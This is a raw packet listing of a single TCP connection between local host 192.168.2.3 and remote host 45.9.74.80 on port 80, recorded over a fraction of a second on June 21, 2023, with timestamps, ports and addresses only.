Jun 21, 2023 04:27:57.960385084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960386992 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960405111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960427046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960436106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960467100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960479021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960489988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960510015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960529089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960556984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960557938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960581064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960582018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960604906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960629940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960629940 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960654020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960664988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960678101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960700989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960711002 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960725069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960750103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960757017 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960774899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960799932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960802078 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960824013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960845947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960849047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960870981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960895061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960897923 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.960916996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960941076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960963011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960984945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.960990906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961009026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961031914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961031914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961057901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961057901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961090088 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961096048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961121082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961143970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961168051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961180925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961190939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961209059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961218119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961242914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961247921 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961267948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961292982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961299896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961317062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961338997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961358070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961374044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961375952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961393118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961406946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961431026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961451054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961477995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961496115 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961503029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961528063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961541891 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961546898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961563110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961575985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961599112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961616039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961623907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961643934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961671114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961679935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961694956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961719036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961741924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961744070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961761951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961765051 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961786985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961793900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961817980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961839914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961864948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961888075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961890936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961913109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961934090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961934090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961952925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.961962938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961986065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.961994886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.962009907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.962028027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.962054968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.962080002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.962079048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.962096930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.962126970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.962162971 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.962188959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.962722063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.975923061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.987474918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987611055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987621069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.987690926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987735987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987765074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.987768888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987817049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987855911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.987857103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987898111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987915993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.987940073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.987981081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988013029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988043070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988059044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988090992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988116980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988133907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988181114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988218069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988221884 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988279104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988291025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988317013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988343954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988374949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988420010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988420963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988459110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988490105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988502979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988542080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988579035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988607883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988615036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988641024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988656998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988696098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988719940 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988735914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988774061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988811016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988830090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988848925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988887072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988898039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988924980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.988929987 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.988964081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989001036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989029884 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989039898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989078999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989098072 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989118099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989156008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989167929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989193916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989231110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989268064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989301920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989304066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989327908 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989343882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989382029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989409924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989417076 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989439964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989461899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989485025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989522934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989562035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989598036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989634037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989639044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989672899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989710093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989717960 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989717960 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989748001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989784956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989821911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989850044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989860058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989869118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.989898920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989934921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989970922 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.989995956 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990006924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990020990 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990046024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990083933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990119934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990151882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990156889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990195990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990206957 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990233898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990271091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990303040 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990309000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990336895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990349054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990386009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990412951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990423918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990462065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990499973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990524054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990536928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990549088 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990576029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990613937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990650892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990679026 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990689039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990700006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990730047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990767002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990803003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990825891 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990844011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990850925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990883112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990919113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990956068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.990974903 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.990998983 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.997067928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.999279976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.001190901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016346931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016436100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016450882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.016496897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016556025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.016561031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016618967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016675949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016686916 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.016731024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016788006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016843081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016851902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.016896963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.016905069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.016979933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017038107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017043114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017095089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017152071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017157078 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017225027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017283916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017333984 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017339945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017395020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017452955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017458916 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017525911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017529964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017590046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017644882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017647028 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017702103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017757893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017757893 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017815113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017874002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017927885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.017934084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.017983913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018037081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018039942 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018086910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018095970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018152952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018203974 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018209934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018280029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018335104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018335104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018388987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018445969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018497944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018501997 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018557072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018611908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018614054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018659115 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018667936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018723965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018778086 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018778086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018836021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018889904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.018893957 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.018944979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019001961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019057989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019073009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019114971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019165993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019170046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019226074 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019227982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019288063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019336939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019344091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019402027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019453049 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019458055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019515038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019570112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019627094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.019650936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019674063 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.019685984 CEST	80	49719	45.9.74.80	192.168.2.3
